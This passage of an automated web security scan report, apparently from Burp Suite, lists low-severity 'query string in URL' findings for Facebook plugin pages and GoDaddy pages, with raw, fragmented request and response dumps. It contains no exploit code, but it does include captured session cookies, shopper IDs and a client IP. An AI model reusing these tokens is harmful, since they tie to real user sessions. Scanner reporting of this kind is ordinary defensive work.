src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/276199_100002826953626_7924076_q.jpg" alt="" /> <div class="name">...[SNIP]...
15.53. http://www.facebook.com/plugins/likebox.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.facebook.com
Path:
/plugins/likebox.php
Issue detail
The page was loaded from a URL containing a query string:http://www.facebook.com/plugins/likebox.php?channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33f10cb48%26origin%3Dhttp%253A%252F%252Fthehackernews.com%252Ff2c1c37b3%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=258&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FThe-Hacker-News%2F172819872731894&locale=en_US&sdk=joey&show_faces=true&stream=false&width=292 http://profile.ak.fbcdn.net/hprofile-ak-ash2/261066_100002111591190_1880089109_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-ash2/49546_100000147617291_5524_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/203430_100001923114560_5058758_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/211495_100002604038031_6142559_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/261059_100002818221944_1768173176_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/275106_1562735743_7219073_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/275185_1068105476_1228374674_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/275445_1418224949_131699991_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/275660_100001981990343_7522079_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/275875_100001999617244_2028111589_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/276439_172819872731894_1083760684_q.jpg http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/jSVhQVZmVYK.css http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/elwwSDjKYPa.css http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/1iO7XjW7Qh8.css
Request
GET /plugins/likebox.php?channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33f10cb48%26origin%3Dhttp%253A%252F%252Fthehackernews.com%252Ff2c1c37b3%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=258&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FThe-Hacker-News%2F172819872731894&locale=en_US&sdk=joey&show_faces=true&stream=false&width=292 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM
Response
HTTP/1.1 200 OK=false;</script><title>Likebox</title><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/jSVhQVZmVYK.css" /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css" /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css" /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/1iO7XjW7Qh8.css" /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css" /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/elwwSDjKYPa.css" /> <script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"> </script><script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"> </script><script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"> </script><script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"> </script><script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"> </script>...[SNIP]... .com/thehackernews" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276439_172819872731894_1083760684_q.jpg" alt="The Hacker News" /> </a>...[SNIP]... <img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /> <div class="name">...[SNIP]... <img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/261059_100002818221944_1768173176_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/shabbir.sheikh3" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/49546_100000147617291_5524_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/profile.php?id=100001999617244" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275875_100001999617244_2028111589_q.jpg" alt="" /> <div class="name">...[SNIP]... <img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/261066_100002111591190_1880089109_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/xta2yax" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211495_100002604038031_6142559_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/profile.php?id=100001981990343" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275660_100001981990343_7522079_q.jpg" alt="" /> <div class="name">...[SNIP]... <img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275445_1418224949_131699991_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/profile.php?id=100001923114560" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203430_100001923114560_5058758_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/vishwaje" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275185_1068105476_1228374674_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/jeetkhaira" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275106_1562735743_7219073_q.jpg" alt="" /> <div class="name">...[SNIP]...
15.54. http://www.facebook.com/plugins/recommendations.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.facebook.com
Path:
/plugins/recommendations.php
Issue detail
The page was loaded from a URL containing a query string:http://www.facebook.com/plugins/recommendations.php?header=true&height=450&linktarget=_blank&locale=en_US&sdk=joey&site=http%3A%2F%2Fwww.thehackernews.com%2F&width=290 http://external.ak.fbcdn.net/safe_image.php?d=AQAxtvEtsYrBh2nD&url=http%3A%2F%2F1.bp.blogspot.com%2F-nH9c1Pt2JkQ%2FTnD1E-A_QRI%2FAAAAAAAAC-I%2FCPkeJCOY7uU%2Fs72-c%2Fmcafee-security-i.jpg http://external.ak.fbcdn.net/safe_image.php?d=AQC3A3ijBE7LKmm3&url=http%3A%2F%2F2.bp.blogspot.com%2F-sZmy-GYwaaM%2FTnDzZ-3-xVI%2FAAAAAAAAC-E%2FzseWYDx7xsc%2Fs72-c%2F5580OS_Backtrack%2B5%2BWireless%2BPenetration.jpg http://external.ak.fbcdn.net/safe_image.php?d=AQCi6HHD68DxU8Id&url=http%3A%2F%2F2.bp.blogspot.com%2F-5zIBHbO9nWQ%2FTmzvftai4aI%2FAAAAAAAAC9U%2Fc1PXw6RMUNk%2Fs72-c%2FUntitled.png http://external.ak.fbcdn.net/safe_image.php?d=AQCx9RsHnqwWR1_n&url=http%3A%2F%2F3.bp.blogspot.com%2F-UPdHdPAe1_0%2FTnFI9TMnUQI%2FAAAAAAAAC-Q%2FOWy7uC2GDhs%2Fs72-c%2F6cce61d0e149ded800658df34cc65859.png http://external.ak.fbcdn.net/safe_image.php?d=AQDFADh7TqtijkTX&url=http%3A%2F%2F4.bp.blogspot.com%2F-Yoo5MpW62Ak%2FTm-iVxFbFKI%2FAAAAAAAAC90%2FbSp1U0gljjw%2Fs72-c%2F2yy8i1j.jpg http://external.ak.fbcdn.net/safe_image.php?d=AQDIHPy4e2QqyxZZ&url=http%3A%2F%2F2.bp.blogspot.com%2F-p-Y6wCqU1wI%2FTmuXtEEdRwI%2FAAAAAAAAC88%2FwK27xaKWbr4%2Fs72-c%2F14.jpg http://external.ak.fbcdn.net/safe_image.php?d=AQDRzOhVB6wAQA7a&url=http%3A%2F%2F3.bp.blogspot.com%2F-2ezBR6Ne9BY%2FTmpeFas1vtI%2FAAAAAAAAC8o%2Fvx187B4FbYE%2Fs72-c%2Ffacebook_hack_0504.jpg http://external.ak.fbcdn.net/safe_image.php?d=AQDYztJTEHTcyElu&url=http%3A%2F%2F3.bp.blogspot.com%2F_bCYQxIvMQ2U%2FTRqK9wgVGzI%2FAAAAAAAAAdc%2FtD-g16bzFlg%2Fs72-c%2FuHqRnMmR.jpg http://external.ak.fbcdn.net/safe_image.php?d=AQDuS0scXDsBnLup&url=http%3A%2F%2F3.bp.blogspot.com%2F-itc0CCFi_zQ%2FTmzHiGneLKI%2FAAAAAAAAC9M%2FKKTnFt9O7nY%2Fs72-c%2FLinux-Foundation.jpg http://thehackernews.com/2011/09/14-years-in-jail-for-mass-credit-card.html http://thehackernews.com/2011/09/book-backtrack-5-wireless-penetration.html http://thehackernews.com/2011/09/cyberwar-between-israel-and-turkish.html http://thehackernews.com/2011/09/fbpwn-cross-platform-facebook-profile.html http://thehackernews.com/2011/09/linux-foundation-linuxcom-multiple.html http://thehackernews.com/2011/09/mcafee-deepsafe-anti-rootkit-security.html http://thehackernews.com/2011/09/opiran-new-press-release-for-23.html http://thehackernews.com/2011/09/thc-hydra-v70-new-version-released-for.html http://thehackernews.com/2011/09/truth-alliance-network-and-20-churches.html
Request
GET /plugins/recommendations.php?header=true&height=450&linktarget=_blank&locale=en_US&sdk=joey&site=http%3A%2F%2Fwww.thehackernews.com%2F&width=290 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM
Response
HTTP/1.1 200 OK=false;</script><title>1</title><style>body{background:#fff;font-size: 11px;font-family:"...[SNIP]... <a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="FBPwn : A Cross-Platform Facebook Profile Dumper tool ~ THN : The Hacker News" href="http://thehackernews.com/2011/09/fbpwn-cross-platform-facebook-profile.html" target="_blank"> <img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQDRzOhVB6wAQA7a&url=http%3A%2F%2F3.bp.blogspot.com%2F-2ezBR6Ne9BY%2FTmpeFas1vtI%2FAAAAAAAAC8o%2Fvx187B4FbYE%2Fs72-c%2Ffacebook_hack_0504.jpg" alt="" /> </a>...[SNIP]... <a class="fbMonitor" href="http://thehackernews.com/2011/09/fbpwn-cross-platform-facebook-profile.html" target="_blank"> FBPwn : A Cross-Platform Facebook Profile Dumper tool ~ THN : The Hacker News</a>...[SNIP]... <a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="#Opiran new press release for 23 September by Anonymous Hackers ~ THN : The Hacker News" href="http://thehackernews.com/2011/09/opiran-new-press-release-for-23.html" target="_blank"> <img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQDFADh7TqtijkTX&url=http%3A%2F%2F4.bp.blogspot.com%2F-Yoo5MpW62Ak%2FTm-iVxFbFKI%2FAAAAAAAAC90%2FbSp1U0gljjw%2Fs72-c%2F2yy8i1j.jpg" alt="" /> </a>...[SNIP]... <a class="fbMonitor" href="http://thehackernews.com/2011/09/opiran-new-press-release-for-23.html" target="_blank"> #Opiran new press release for 23 September by Anonymous Hackers ~ THN : The Hacker News</a>...[SNIP]... <a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Truth Alliance Network and 20 Churches websites hacked by Muslim Liberation Army ~ THN : The Hacker." href="http://thehackernews.com/2011/09/truth-alliance-network-and-20-churches.html" target="_blank"> <img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQCi6HHD68DxU8Id&url=http%3A%2F%2F2.bp.blogspot.com%2F-5zIBHbO9nWQ%2FTmzvftai4aI%2FAAAAAAAAC9U%2Fc1PXw6RMUNk%2Fs72-c%2FUntitled.png" alt="" /> </a>...[SNIP]... <a class="fbMonitor" href="http://thehackernews.com/2011/09/truth-alliance-network-and-20-churches.html" target="_blank"> Truth Alliance Network and 20 Churches websites hacked by Muslim Liberation Army ~ THN : The Hacker.</a>...[SNIP]... <a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Linux Foundation & Linux.com multiple server compromised ~ THN : The Hacker News" href="http://thehackernews.com/2011/09/linux-foundation-linuxcom-multiple.html" target="_blank"> <img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQDuS0scXDsBnLup&url=http%3A%2F%2F3.bp.blogspot.com%2F-itc0CCFi_zQ%2FTmzHiGneLKI%2FAAAAAAAAC9M%2FKKTnFt9O7nY%2Fs72-c%2FLinux-Foundation.jpg" alt="" /> </a>...[SNIP]... <a class="fbMonitor" href="http://thehackernews.com/2011/09/linux-foundation-linuxcom-multiple.html" target="_blank"> Linux Foundation & Linux.com multiple server compromised ~ THN : The Hacker News</a>...[SNIP]... <a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="THC-HYDRA v7.0 new version released for Download ~ THN : The Hacker News" href="http://thehackernews.com/2011/09/thc-hydra-v70-new-version-released-for.html" target="_blank"> <img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQCx9RsHnqwWR1_n&url=http%3A%2F%2F3.bp.blogspot.com%2F-UPdHdPAe1_0%2FTnFI9TMnUQI%2FAAAAAAAAC-Q%2FOWy7uC2GDhs%2Fs72-c%2F6cce61d0e149ded800658df34cc65859.png" alt="" /> </a>...[SNIP]... <a class="fbMonitor" href="http://thehackernews.com/2011/09/thc-hydra-v70-new-version-released-for.html" target="_blank"> THC-HYDRA v7.0 new version released for Download ~ THN : The Hacker News</a>...[SNIP]... <a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Cyberwar between Israel and Turkish Hacker ~ THN : The Hacker News" href="http://thehackernews.com/2011/09/cyberwar-between-israel-and-turkish.html" target="_blank"> <img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQDYztJTEHTcyElu&url=http%3A%2F%2F3.bp.blogspot.com%2F_bCYQxIvMQ2U%2FTRqK9wgVGzI%2FAAAAAAAAAdc%2FtD-g16bzFlg%2Fs72-c%2FuHqRnMmR.jpg" alt="" /> </a>...[SNIP]... <a class="fbMonitor" href="http://thehackernews.com/2011/09/cyberwar-between-israel-and-turkish.html" target="_blank"> Cyberwar between Israel and Turkish Hacker ~ THN : The Hacker News</a>...[SNIP]... <a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="14 Years in Jail for mass credit card theft ~ THN : The Hacker News" href="http://thehackernews.com/2011/09/14-years-in-jail-for-mass-credit-card.html" target="_blank"> <img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQDIHPy4e2QqyxZZ&url=http%3A%2F%2F2.bp.blogspot.com%2F-p-Y6wCqU1wI%2FTmuXtEEdRwI%2FAAAAAAAAC88%2FwK27xaKWbr4%2Fs72-c%2F14.jpg" alt="" /> </a>...[SNIP]... <a class="fbMonitor" href="http://thehackernews.com/2011/09/14-years-in-jail-for-mass-credit-card.html" target="_blank"> 14 Years in Jail for mass credit card theft ~ THN : The Hacker News</a>...[SNIP]... <a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Book : Backtrack 5 Wireless Penetration Testing by Vivek Ramachandran ~ THN : The Hacker News" href="http://thehackernews.com/2011/09/book-backtrack-5-wireless-penetration.html" target="_blank"> <img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQC3A3ijBE7LKmm3&url=http%3A%2F%2F2.bp.blogspot.com%2F-sZmy-GYwaaM%2FTnDzZ-3-xVI%2FAAAAAAAAC-E%2FzseWYDx7xsc%2Fs72-c%2F5580OS_Backtrack%2B5%2BWireless%2BPenetration.jpg" alt="" /> </a>...[SNIP]... <a class="fbMonitor" href="http://thehackernews.com/2011/09/book-backtrack-5-wireless-penetration.html" target="_blank"> Book : Backtrack 5 Wireless Penetration Testing by Vivek Ramachandran ~ THN : The Hacker News</a>...[SNIP]... <a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="McAfee DeepSAFE - Anti-rootkit Security Solution ~ THN : The Hacker News" href="http://thehackernews.com/2011/09/mcafee-deepsafe-anti-rootkit-security.html" target="_blank"> <img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQAxtvEtsYrBh2nD&url=http%3A%2F%2F1.bp.blogspot.com%2F-nH9c1Pt2JkQ%2FTnD1E-A_QRI%2FAAAAAAAAC-I%2FCPkeJCOY7uU%2Fs72-c%2Fmcafee-security-i.jpg" alt="" /> </a>...[SNIP]... <a class="fbMonitor" href="http://thehackernews.com/2011/09/mcafee-deepsafe-anti-rootkit-security.html" target="_blank"> McAfee DeepSAFE - Anti-rootkit Security Solution ~ THN : The Hacker News</a>...[SNIP]...
15.55. http://www.godaddy.com/gdshop/site_search.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/gdshop/site_search.asp
Issue detail
The page was loaded from a URL containing a query string:http://www.godaddy.com/gdshop/site_search.asp?ci=9104&pageNum=1&searchFor=xss http://imagesak.securepaynet.net/AtlantisScripts/jquery/jquery-1.3.1.min.js http://imagesak.securepaynet.net/aaa/help/1/icn_quickhelp.gif http://imagesak.securepaynet.net/assets/godaddy.ico http://imagesak.securepaynet.net/assets/spc_trans.gif http://imagesak.securepaynet.net/css/20090113_1.css http://img2.wsimg.com/pc_css/1/gd_20110906_http.min.css http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js http://www.bobparsons.me/index.php?id=-1 http://www.godaddycares.com/ https://email.secureserver.net/ https://login.secureserver.net/index.php https://login.secureserver.net/index.php?ci=17195&prog_id=GoDaddy&app=wbe
Request
POST /gdshop/site_search.asp?ci=9104&pageNum=1&searchFor=xss HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7=vb1jphe2sxzvygvmo3bblx55; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; SplitValue1=19; HPBackground=DanicaImageOne; currency1=potableSourceStr=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; traffic=; pathway=2a590ae0-0ee8-47bd-8061-af016da64611; pagecount=1; actioncount=; app_pathway=; visitor=vid=2a590ae0-0ee8-47bd-8061-af016da64611; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1-urlencoded
Response
HTTP/1.1 200 OKORPWEB181&sitename=www%2Egodaddy%2Ecom&cookies=1&clientip=50%2E23%2E123%2E106&status=200+OK&referrer=http%3A%2F%2Fwww%2Egodaddy%2Ecom%2F&isc=&privatelabelid=1&page=%2Fgdshop%2Fsite%5Fsearch%2Easp&referringdomain=&referringpath=2a590ae0%2D0ee8%2D47bd%2D8061%2Daf016da64611&shopper=46215684&querystring=ci%3D9104%26pageNum%3D1%26searchFor%3Dxss; domain=.godaddy.com; path=//xhtml1/DTD/xhtml1-transitional.dtd"><html>...[SNIP]... <link rel="shortcut icon" href="http://imagesak.securepaynet.net/assets/godaddy.ico"> <link rel="stylesheet" type="text/css" href="http://img2.wsimg.com/pc_css/1/gd_20110906_http.min.css" /> <link rel="stylesheet" type="text/css" href="http://imagesak.securepaynet.net/css/20090113_1.css"> ...[SNIP]... <script src="http://imagesak.securepaynet.net/AtlantisScripts/jquery/jquery-1.3.1.min.js" type="text/javascript"> </script><div style="position:absolute;top:0;left:0;width:1px;height:1px;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" border="0" width="1" height="1" alt="Welcome to Go Daddy Software. If you are visually impaired and would like to check the availability of a domain, make a purchase, or just have questions please call us at (480) 505-8877. You may also email us at support@godaddy.com to request a website service callback.. We are currently in the process of implementing more accessibility for our visitors so feel free to check back in the near future..Thank you for your interest in our company."> </div>...[SNIP]... <script type="text/javascript" language="javascript" src="http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"> </script>...[SNIP]... ://www.bobparsons.me/index.php?ci=13338&id=-1', '_blank'); return false;"><a href="http://www.bobparsons.me/index.php?id=-1"> Bob's Video Blog</a>...[SNIP]... <a href="https://login.secureserver.net/index.php"> ...[SNIP]... <a href="https://email.secureserver.net/"> ...[SNIP]... (this,'search',false)" style="cursor: pointer;" onmouseout="ShowHelp(this,'search',true)"><img height=13 hspace=4 src="http://imagesak.securepaynet.net/aaa/help/1/icn_quickhelp.gif" width=13 align=absMiddle border=0> </span>...[SNIP]... <a href="https://login.secureserver.net/index.php?ci=17195&prog_id=GoDaddy&app=wbe" target="_blank"> Webmail</a>...[SNIP]... <a style="color:blue;text-decoration:underline;font-size:12px;" href="http://www.godaddycares.com" onclick="pcj_win('http://img.godaddy.com/redirect.aspx?ci=42374&target=http%3a%2f%2fwww.godaddycares.com'); return false;"> GoDaddyCares.com</a>...[SNIP]...
15.56. http://www.godaddy.com/offers/hot-deals2.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/offers/hot-deals2.aspx
Issue detail
The page was loaded from a URL containing a query string:http://www.godaddy.com/offers/hot-deals2.aspx?ci=51455 http://img1.wsimg.com/assets/godaddy.ico http://img2.wsimg.com/fos/css/1/sales_http_20110711.css http://img2.wsimg.com/pc_css/1/gd_20110906_http.min.css http://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.5.1.min.js http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=2 http://img3.wsimg.com/fos/script/atlantis_jquery9.min.js http://img3.wsimg.com/fos/script/sales16.min.js http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js http://www.bobparsons.me/index.php?id=-1 http://www.godaddycares.com/ https://email.secureserver.net/ https://login.secureserver.net/index.php https://login.secureserver.net/index.php?isc=d0d8de1c80&ci=17195&prog_id=GoDaddy&app=wbe
Request
GET /offers/hot-deals2.aspx?ci=51455 HTTP/1.1/domains/search.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; ASP.NET_SessionId=kwd42kibl1s4hu55omguef55; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; HPBackground=DanicaImageTwo; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/Domains/Controls/JsonContent/generalPricing.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=TargetDivID=general_pricing_json_content&_=1316214561887&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; currency1=potableSourceStr=USD; adc1=US
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:35 GMT; path=/&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/offers/hot-deals2.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=ci=51455&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml"><link rel="Stylesheet" type="text/css" href="http://img2.wsimg.com/fos/css/1/sales_http_20110711.css" /> <title>...[SNIP]... <link rel="Stylesheet" type="text/css" href="http://img2.wsimg.com/pc_css/1/gd_20110906_http.min.css" /> ...[SNIP]... <link rel="shortcut icon" href="http://img1.wsimg.com/assets/godaddy.ico" /> </head>:0;"><script src="http://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.5.1.min.js" type="text/javascript"> </script>...[SNIP]... <script type="text/javascript" language="javascript" src="http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"> </script>...[SNIP]... ://www.bobparsons.me/index.php?isc=d0d8de1c80&ci=13338&id=-1', '_blank'); return false;"><a href="http://www.bobparsons.me/index.php?id=-1"> Bob's Video Blog</a>...[SNIP]... <a href="https://login.secureserver.net/index.php"> ...[SNIP]... <a href="https://email.secureserver.net/"> ...[SNIP]... <a href="https://login.secureserver.net/index.php?isc=d0d8de1c80&ci=17195&prog_id=GoDaddy&app=wbe" target="_blank"> Webmail</a>...[SNIP]... <a style="color:blue;text-decoration:underline;font-size:12px;" href="http://www.godaddycares.com" onclick="pcj_win('http://img.godaddy.com/redirect.aspx?isc=d0d8de1c80&ci=42374&target=http%3a%2f%2fwww.godaddycares.com'); return false;"> GoDaddyCares.com</a>...[SNIP]... <script src="http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=2" type="text/javascript"> </script><script src="http://img3.wsimg.com/fos/script/sales16.min.js" type="text/javascript"> </script><script src="http://img3.wsimg.com/fos/script/atlantis_jquery9.min.js" type="text/javascript"> </script>...[SNIP]...
15.57. http://www.godaddy.com/productadvisor/pastart.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/productadvisor/pastart.aspx
Issue detail
The page was loaded from a URL containing a query string:http://www.godaddy.com/productadvisor/pastart.aspx?ci=13108 http://img1.wsimg.com/assets/godaddy.ico http://img2.wsimg.com/fos/css/1/sales_http_20110711.css http://img2.wsimg.com/pc_css/1/gd_20110906_http.min.css http://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=2 http://img3.wsimg.com/fos/script/ProductAdvisor5.min.js http://img3.wsimg.com/fos/script/sales16.min.js http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js http://www.bobparsons.me/index.php?id=-1 http://www.godaddycares.com/ https://email.secureserver.net/ https://login.secureserver.net/index.php https://login.secureserver.net/index.php?ci=17195&prog_id=GoDaddy&app=wbe
Request
GET /productadvisor/pastart.aspx?ci=13108 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/gdshop/site_search.asp?ci=9104&pageNum=1&searchFor=xss=vb1jphe2sxzvygvmo3bblx55; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; SplitValue1=19; HPBackground=DanicaImageOne; currency1=potableSourceStr=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; traffic=; pathway=2a590ae0-0ee8-47bd-8061-af016da64611; pagecount=2; actioncount=; app_pathway=; visitor=vid=2a590ae0-0ee8-47bd-8061-af016da64611; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=0&fMajorVer=0&slMajorVer=-1&slMinorVer=-1; domainYardVal=%2D1; serverVersion=A; ASPSESSIONIDQCRSARQR=BGAMBCHBECAECHGCHMMADCKA
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:07:38 GMT; path=/&referrer=http://www.godaddy.com/gdshop/site_search.asp?ci=9104&pageNum=1&searchFor=xss&sitename=www.godaddy.com&page=/productadvisor/pastart.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=ci=13108&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=2a590ae0-0ee8-47bd-8061-af016da64611&referringdomain=&split=19; domain=godaddy.com; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml"><link rel="Stylesheet" type="text/css" href="http://img2.wsimg.com/fos/css/1/sales_http_20110711.css" /> <title>...[SNIP]... <link rel="Stylesheet" type="text/css" href="http://img2.wsimg.com/pc_css/1/gd_20110906_http.min.css" /> ...[SNIP]... <link rel="shortcut icon" href="http://img1.wsimg.com/assets/godaddy.ico" /> </head>:0;"><script 